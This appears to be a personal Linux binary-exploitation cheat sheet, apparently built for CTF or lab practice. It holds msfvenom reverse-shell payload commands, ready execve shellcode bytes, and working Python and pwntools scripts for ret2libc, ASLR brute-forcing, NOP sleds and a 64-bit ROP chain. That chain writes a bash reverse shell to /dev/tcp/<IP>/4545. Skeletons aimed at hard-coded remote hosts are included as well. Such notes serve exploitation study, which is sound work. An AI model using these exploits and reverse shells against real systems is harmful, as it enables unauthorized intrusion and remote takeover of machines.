Linux
Very Basic
# -----------| General Purpose Registers (32bit)
EAX # Arithmetic and Logical Instructions
EBX # Base Pointer for Memory Addresses
ECX # Loop, Shift, Rotation Counter
EDX # I/O Port Addressing, Multiplication, Division
ESI # Pointer of data and source in string copy operations (Source Index)
EDI # Pointer of data and destination in string copy operations (Destination Index)
# -----------| Stack (32bit)
ESP # The Stack Pointer (holds the address of the current top of the stack)
EBP # The Base Pointer
EIP # The Instruction Pointer (address of the next instruction to execute; a stack overflow overwrites the saved copy of it to redirect execution)
Create shell code
# -----------| Windows
msfvenom -p windows/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f c
msfvenom -p windows/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f c -e x86/shikata_ga_nai -b "\x00\x0a\x0d\x25\x26...BAD_CHARS"
msfvenom -p windows/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> EXITFUNC=thread -f c -e x86/shikata_ga_nai -b "\x00\x0a\x0d\x25\x26...BAD_CHARS"
# -----------| Linux
msfvenom -p linux/x86/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> EXITFUNC=thread -f c -b "\x00"   # -b lists the target's bad chars (at least \x00 for str*-style copies); EXITFUNC is a Windows-payload option and does not appear to affect linux payloads
# -----------| Linux bit 32
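# execve("/bin//sh", NULL, NULL) followed by exit(): 28 bytes, contains no NUL byte.
#   xor eax,eax ; push eax ; push "//sh" ; push "/bin" ; mov ebx,esp ; mov ecx,eax ; mov edx,eax
#   mov al,0xb ; int 0x80 ; xor eax,eax ; inc eax ; int 0x80
# Kept as a bytes literal: a Python 3 str would be UTF-8 encoded on output and every
# byte >= 0x80 (e.g. \xc0, \x89, \xcd) would turn into two bytes, corrupting the shellcode.
SHELL_CODE = b"\x31\xc0\x50\x68\x2f\x2f\x73"
SHELL_CODE += b"\x68\x68\x2f\x62\x69\x6e\x89"
SHELL_CODE += b"\xe3\x89\xc1\x89\xc2\xb0\x0b"
SHELL_CODE += b"\xcd\x80\x31\xc0\x40\xcd\x80"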
# -----------| Linux bit 64
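# execve("/bin//sh", ...) on x86-64: 21 bytes, contains no NUL byte.
#   push rax ; xor rdx,rdx ; movabs rbx,"/bin//sh" ; push rbx ; push rsp ; pop rdi ; mov al,0x3b ; syscall
# NOTE(review): this relies on rax being 0 on entry (the first `push rax` is the string's NUL
# terminator and `mov al,0x3b` only sets the low byte) and never sets rsi (argv); confirm those
# registers on the target, or prepend `xor eax,eax` / `xor esi,esi` if they are not clean.
# Kept as bytes so nothing is re-encoded on the way out (see the 32-bit note above).
SHELL_CODE = b"\x50\x48\x31\xd2\x48\xbb\x2f"
SHELL_CODE += b"\x62\x69\x6e\x2f\x2f\x73\x68"
SHELL_CODE += b"\x53\x54\x5f\xb0\x3b\x0f\x05"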
00. Basic Checks
# -----------| CPU architecture information
lscpu
# -----------| x86-64 system call numbers (used by the 64-bit shellcode, e.g. execve = 0x3b)
cat /usr/include/x86_64-linux-gnu/asm/unistd_64.h
# -----------| checksec info
checksec <FileName>
Arch: i386-32-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX enabled <-- the stack is not executable, so we cannot drop shellcode there and jump to it; use ret2libc / ROP instead
PIE: No PIE (0x8048000)
# -----------| Disable ASLR (Address Space Layout Randomization)
echo 0 > /proc/sys/kernel/randomize_va_space   # must run as root (with sudo the redirection needs a root shell: echo 0 | sudo tee /proc/sys/kernel/randomize_va_space); system-wide, not persistent across reboots; restore the default with 2
# -----------| Create pattern
/usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 200
# -----------| Check offset value
/usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -q <EIP_VALUE>
Get all functions
readelf -s <FileName> | grep FUNC
01. ret2libc (NX enabled)
# -----------| Check ASLR changing ?
for i in {1..20}; do ldd <FileName> | grep libc; done   # if the libc load address differs between runs, ASLR is on
Return to
libc
** [ ASLR OFF ]**
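import struct
import sys


def p32(value):
    """Pack a 32-bit address little-endian, the byte order the x86 stack expects."""
    return struct.pack("<I", value)


def build_payload(libc_base, junk_len=52):
    """Return the ret2libc payload: junk | &system | &exit | &"/bin/sh".

    The three libc offsets below are target-specific; re-derive them with the
    commented commands whenever the libc build changes.  Works only with ASLR off
    (libc_base must be the address ldd reports for this run).
    """
    junk = b"A" * junk_len  # pwndbg: cyclic -> offset to the saved EIP
    # ldd <FileName> | grep libc   <-- libc_base
    # readelf -s /lib/i386-linux-gnu/libc.so.6 | grep system@@GLI
    system = p32(libc_base + 0x0003ada0)
    # readelf -s /lib/i386-linux-gnu/libc.so.6 | grep _exit@@GLIBC
    # Only used as the address system() returns to, so the target exits instead of crashing;
    # any sane address works here.
    exit_addr = p32(libc_base + 0x000b07c8)
    # strings -atx /lib/i386-linux-gnu/libc.so.6 | grep 'bin/sh'
    binsh = p32(libc_base + 0x0015ba0b)
    # x86 cdecl layout: overwritten return address -> system, then system's own
    # return address, then system's first argument.
    return junk + system + exit_addr + binsh


if __name__ == "__main__":
    # Emit raw bytes; print() on bytes would write the repr "b'...'" rather than the payload.
    sys.stdout.buffer.write(build_payload(0xb7e19000) + b"\n")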
Return to
libc
[ ASLR ON (Bruteforce) ]
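import struct
import sys
from subprocess import call


def p32(value):
    """Pack a 32-bit address little-endian, the byte order the x86 stack expects."""
    return struct.pack("<I", value)


def build_payload(libc_base, junk_len=112):
    """Return the ret2libc payload: junk | &system | &exit | &"/bin/sh".

    libc_base is a *guess* here: with ASLR on the real base changes per run, and
    the loop below simply re-runs the target until the guess happens to be right.
    The offsets are target-specific; re-derive them with the commented commands.
    """
    junk = b"A" * junk_len  # pwndbg: cyclic -> offset to the saved EIP
    # ldd <FileName> | grep libc   <-- one observed libc base, reused as the guess
    # readelf -s /lib/i386-linux-gnu/libc.so.6 | grep system@@GLI
    system = p32(libc_base + 0x00040310)
    # readelf -s /lib/i386-linux-gnu/libc.so.6 | grep _exit@@GLIBC
    # Only the address system() returns to; any sane address works here.
    exit_addr = p32(libc_base + 0x00033290)
    # strings -atx /lib/i386-linux-gnu/libc.so.6 | grep 'bin/sh'
    binsh = p32(libc_base + 0x00162bac)
    return junk + system + exit_addr + binsh


if __name__ == "__main__":
    buff = build_payload(0xb75b8000)
    # The payload is passed in argv, so it cannot contain 0x00 (subprocess rejects embedded NULs).
    if b"\x00" in buff:
        sys.exit("payload contains a NUL byte and cannot be passed via argv; pick other addresses")
    # On 32-bit Linux the libc base has only a few bits of randomness, which is why
    # retrying one fixed guess a few hundred times is a practical brute force.
    for attempt in range(513):
        print("Trying: %s" % attempt)
        ret = call(["/programe/file/path", buff])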
Return to
libc
[ ASLR ON (if you have access to machine) ]
# -----------| Get running process memory values
cat /proc/<PID>/maps
# -----------| Find Variable Values
## head -1 /proc/<PID>/maps | awk -F\- '{print "0x"$1}'
base = 0x<value>
## grep 'libc' /proc/<PID>/maps | head -1 | awk -F\- '{print "0x"$1}'
libc_base = 0x<value>
## Download the libc file
## grep 'libc' /proc/<PID>/maps | head -1 | awk '{print $NF}' | xargs -I {} cp {} libc.so
## objdump -d libc.so | grep system | head -1 | awk '{print $1}'   (plain "grep system" also matches call sites; "readelf -s libc.so | grep ' system@@'" gives the exact symbol, as in the 32-bit section)
## the printed value is system's offset inside libc: drop the leading zeros and prefix 0x (it is usually the last 5 hex digits)
libc_system = p64(libc_base + 0x<value>)
# -----------| Find Gadgets
## Install ropper
pip install ropper --break-system-packages   # --break-system-packages can damage the distro's Python; prefer "pipx install ropper" or a venv
## Find RDI
## ropper -f libc.so --search "pop rdi; ret"
pop_rdi = p64(libc_base + 0x<last 5 digits>)
## Find RDX
## ropper -f libc.so --search "pop rdx; ret"
pop_rdx = p64(libc_base + 0x<last 5 digits>)
## Find Mov
## ropper -f libc.so --search "mov [rdi], rdx"   (the gadget must be followed by a ret, otherwise the chain stops there)
mov = p64(libc_base + 0x<last 5 digits>)
# -----------| Find writeble mem
## readelf -x .data <binary>   (readelf -S <binary> shows .data's address and size; the command string plus its NUL terminator must fit inside it)
writable = base + 0x<last 5 digits>
# -----------| Final sample code
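try:
    from pwn import *  # pwntools: p64()
except ImportError:  # lets build_chain() be imported/tested without pwntools installed
    import struct

    def p64(value):
        """Pack a 64-bit address little-endian."""
        return struct.pack("<Q", value)

offset = 520                        # bytes up to the saved return address (pattern/cyclic)
base = 0x559b1a806000               # binary base from /proc/<PID>/maps (PIE: changes every run)
libc_base = 0x7fbc1b8d9000          # libc base from /proc/<PID>/maps
libc_system = p64(libc_base + 0x48e50)
pop_rdi = p64(libc_base + 0x26796)  # pop rdi ; ret
pop_rdx = p64(libc_base + 0xcb1cd)  # pop rdx ; ret
mov = p64(libc_base + 0x3ace5)      # mov [rdi], rdx ; ret   (must end in ret to continue the chain)
writable = base + 0x4000            # .data: the command string is written here, 8 bytes at a time
cmd = b"bash -c 'bash -i >& /dev/tcp/<IP>/4545 0>&1'"


def build_chain(offset, writable, cmd, pop_rdi, pop_rdx, mov, libc_system):
    """Return junk | write-what-where loop | system(writable) as one bytes object.

    Every 8-byte chunk of cmd is stored with: pop rdi (destination) ; pop rdx (chunk) ;
    mov [rdi], rdx.  The original chain left out the `pop rdx` step, so the chunk bytes
    were consumed by the `ret` of the pop-rdi gadget as a return address and the
    process crashed on the first iteration.
    A NUL terminator is appended so system() stops at the end of the command even when
    len(cmd) is a multiple of 8 (.data is not guaranteed to be zero past the string).
    NOTE(review): system() may require a 16-byte aligned stack on entry; if it faults
    on a movaps, add one extra `ret` gadget in front of libc_system.
    """
    data = cmd + b"\x00"
    rop = b"A" * offset
    for i in range(0, len(data), 8):
        rop += pop_rdi
        rop += p64(writable + i)
        rop += pop_rdx
        rop += data[i:i + 8].ljust(8, b"\x00")
        rop += mov
    rop += pop_rdi
    rop += p64(writable)
    rop += libc_system
    return rop


if __name__ == "__main__":
    with open("license.key", "wb") as f:
        f.write(build_chain(offset, writable, cmd, pop_rdi, pop_rdx, mov, libc_system))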
02. NOP sled (NX disabled)
## ------------------| x86 Bit
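import sys

BUF_SIZE = 362  # bytes from the start of the buffer up to the saved return address
# execve("/bin//sh") + exit(), 28 bytes, no NUL byte; it must also avoid the target's other bad chars.
# Bytes literal on purpose: a str would be UTF-8 encoded on output and corrupt every byte >= 0x80.
SHELL_CODE = b"\x31\xc0\x50\x68\x2f\x2f\x73"
SHELL_CODE += b"\x68\x68\x2f\x62\x69\x6e\x89"
SHELL_CODE += b"\xe3\x89\xc1\x89\xc2\xb0\x0b"
SHELL_CODE += b"\xcd\x80\x31\xc0\x40\xcd\x80"
# Placeholder: an address inside the NOP sled, little-endian, e.g. 0xbffff4c0 -> b"\xc0\xf4\xff\xbf"
EIP = b"?"


def build_payload(eip, buf_size=BUF_SIZE, shellcode=SHELL_CODE):
    """Return NOP sled | shellcode | eip, exactly buf_size + len(eip) bytes.

    Needs an executable stack (NX disabled) and ASLR off, otherwise the sled
    address is not stable between runs.  Raises ValueError if the shellcode is
    larger than buf_size (the original silently produced a negative-length sled).
    """
    if len(shellcode) > buf_size:
        raise ValueError("shellcode (%d bytes) does not fit in %d bytes" % (len(shellcode), buf_size))
    nop_sled = b"\x90" * (buf_size - len(shellcode))
    return nop_sled + shellcode + eip


if __name__ == "__main__":
    # Fail fast instead of emitting a payload with a 1-byte return address.
    if len(EIP) != 4:
        sys.exit("set EIP to the 4-byte little-endian return address first")
    sys.stdout.buffer.write(build_payload(EIP) + b"\n")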
03. PWNtool Skeletons
ret2libc
(32 bit)
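#!/usr/bin/python3
"""ret2libc skeleton (32-bit) against a remote service.

The addresses are read from gdb on a local copy of the target; they are only
valid if the remote libc (and its load address, i.e. ASLR off) matches.
"""
try:
    from pwn import *  # pwntools: p32(), remote(), gdb, context
except ImportError:  # lets the payload be built/tested without pwntools installed
    import struct

    def p32(value):
        """Pack a 32-bit address little-endian."""
        return struct.pack("<I", value)

junk = b"A" * 212  # offset to the saved EIP (cyclic / pattern_offset)
# gdb: run once, Ctrl+C to break into it, then `p system`
system = p32(0xf7e4c060)
# gdb: `p exit`  (only the address system() returns to)
exit_addr = p32(0xf7e3faf0)
# gdb: `find &system,+9999999,"sh"`, pick a hit and confirm with `x/s <hit>`, e.g. x/s 0xf7f6ddd5
# The original assigned the exit() address here as well, which would make system()
# run the bytes of exit() as a command instead of "sh"; use the string address from `find`.
binsh = p32(0xf7f6ddd5)
# x86 cdecl: return address -> system, system's return address -> exit, argument -> "sh"
payload = junk + system + exit_addr + binsh

if __name__ == "__main__":
    context(terminal=["tmux", "new-window"])
    # context(os="linux", arch="i386")
    # Local mode:  programe = gdb.debug("./myapp", "b main")
    # Remote mode:
    programe = remote("10.10.10.61", 32812)
    # programe.recvuntil(b"What do you want me to echo back?")
    programe.recvuntil(b"Enter Bridge Access Code:")  # bytes: newer pwntools warns/rejects str on tubes
    programe.sendline(b"Something")
    programe.sendline(payload)
    programe.interactive()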
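"""ROP skeleton (64-bit, non-PIE binary): all addresses come from the binary itself."""
try:
    from pwn import *  # pwntools: p64(), remote(), gdb, context
except ImportError:  # lets the payload be built/tested without pwntools installed
    import struct

    def p64(value):
        """Pack a 64-bit address little-endian."""
        return struct.pack("<Q", value)

junk = b"A" * 112            # offset to the saved return address (cyclic / pattern_offset)
bin_sh = b"/bin/sh\x00"      # NUL-terminated; lands on the stack directly after the junk
system = p64(0x40116e)       # address inside the binary (No PIE, so stable under ASLR)
pop_r13 = p64(0x401206)      # gadget starting with pop r13
null = p64(0x0)
test = p64(0x401152)
# NOTE(review): the layout pop_r13 -> system, null, null -> test is target-specific: it
# presumably relies on the gadget popping three registers and on `test` consuming them;
# verify against the binary's disassembly before reusing this chain elsewhere.
payload = junk + bin_sh + pop_r13 + system + null + null + test

if __name__ == "__main__":
    # context(terminal=["tmux", "new-window"])
    context(os="linux", arch="amd64")
    # Use exactly one target. The original started gdb.debug() and then also connected
    # remotely, leaving the local debug session running and unused.
    # Local mode:  programe = gdb.debug("./myapp", "b main")
    # Remote mode:
    programe = remote("10.10.10.147", 1337)
    # programe.recvuntil(b"What do you want me to echo back?")
    programe.sendline(payload)
    programe.interactive()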
04. GDB
GDB
# -----------| Find offset
#### Get the random chars
/usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 500
#### Run the application via gdb
gdb <app_name>
r <random_chars>
#### get the below value
## Program received signal SIGSEGV, Segmentation fault.
## <get_this_value> in ?? ()
/usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -q <value_from_above>
# -----------| Find EIP
#### Run the application using gdb
gdb <app_name>
r $(python -c 'print "A"*400')
x/100x $esp
x/100x $esp - 400
#### Find where the 0x41414141 values begin on the stack and pick an address a little way inside the NOP sled.
#### Rewrite EIP as that address in little-endian byte order, e.g.
EIP = "?" ## 0xbffff4c0 --> \xc0\xf4\xff\xbf   (only stable with ASLR off; re-check after changing the environment or argv, which shifts the stack)
GDB-gef
# -----------| load programe
gdb-gef ./myapp
# -----------| Run programe
run
r
# -----------| Create pattern
pattern create 200
# -----------| Search RSP or EIP
x/xg $rsp
pattern offset <RSP Value>
### or
pattern search $rsp
pattern search $eip
pattern search qaaa
pattern search 0x00007fffffffe288
# -----------| Show registers
registers
GDB-Peda
# -----------| load programe
gdb-peda ./myapp
# -----------| Run programe
run
r
# -----------| Get memory address on system (!! run programe before get this)
p system
# -----------| Get memory address on bin/sh; get the value on libc : (!! run programe before get this)
searchmem /bin/sh   # pick the hit inside libc; the address is only reusable while ASLR is off
# -----------| Get memory address on exit
p exit
05. OBJDump
objdump -D myapp | grep system   # finds a system@plt stub in the binary (if it imports system); a No-PIE binary address stays valid even with ASLR on